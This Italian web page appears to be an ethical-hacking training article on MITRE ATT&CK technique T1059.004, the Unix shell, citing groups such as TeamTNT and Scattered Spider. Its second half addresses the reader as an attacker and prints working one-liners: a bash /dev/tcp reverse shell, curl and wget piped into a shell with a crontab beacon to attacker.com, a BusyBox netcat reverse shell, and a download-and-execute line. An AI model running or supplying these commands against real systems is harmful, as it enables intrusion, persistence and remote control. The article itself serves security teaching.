Shell Unix: Command/Scripting Interpreter - Unix Shell (T1059.004)

La shell Unix rappresenta il sistema nervoso centrale di ogni ambiente Linux, macOS ed ESXi. Questa interfaccia di comando permette il controllo totale del sistema operativo attraverso un'ampia varietà di implementazioni come bash, sh, zsh e ash. La sua potenza risiede nella capacità di eseguire sia comandi singoli che script complessi contenenti logica condizionale e cicli.

Questa tecnica si manifesta nella fase di Execution (TA0002) della kill chain, quando gli attaccanti cercano di eseguire codice malevolo sui sistemi compromessi. La shell diventa il veicolo principale per l'esecuzione di payload, la persistenza e il movimento laterale.

I numeri parlano chiaro: 10 gruppi APT documentati utilizzano attivamente questa tecnica, supportati da 45 software malevoli specificamente progettati per sfruttare le shell Unix. Le 5 campagne recenti dimostrano come questa tecnica rimanga centrale nelle operazioni offensive moderne, nonostante sia disponibile solo 1 mitigazione efficace.

L'accesso a una shell Unix apre infinite possibilità offensive. Il comando più basilare per ottenere una reverse shell è sorprendentemente semplice:

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Questa singola riga crea una connessione interattiva verso il tuo server di comando e controllo. Ma le tecniche moderne vanno oltre. Scattered Spider ha dimostrato l'efficacia di combinare shell access con tool legittimi come Teleport, installando il remote access tool direttamente su vCenter Server Appliance compromessi.

Per replicare attacchi più sofisticati, considera la creazione di script modulari. TeamTNT utilizza questa strategia per deployment automatizzati:

#!/bin/bash
curl -s http://attacker.com/stage2.sh | bash
echo "*/5 * * * * wget -q -O- http://attacker.com/beacon | sh" | crontab -

Nei sistemi embedded o ESXi, dove BusyBox fornisce una shell minimale, le tecniche devono adattarsi. COATHANGER sfrutta proprio BusyBox per stabilire reverse shell persistenti su dispositivi IoT compromessi. Il comando diventa:

/bin/busybox nc -e /bin/sh attacker.com 4444

Per ambienti macOS, Contagious Interview ha mostrato l'efficacia di bash downloader mascherati. Lo script coremedia.sh scarica ed esegue payload secondari mantenendo un profilo basso:

curl -fsL "$url" > /tmp/.cache && chmod +x /tmp/.cache && /tmp/.cache

La chiave sta nell'adattare i comandi al contesto specifico del target, sfruttando le peculiarità di ogni variante Unix shell presente nel sistema vittima.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.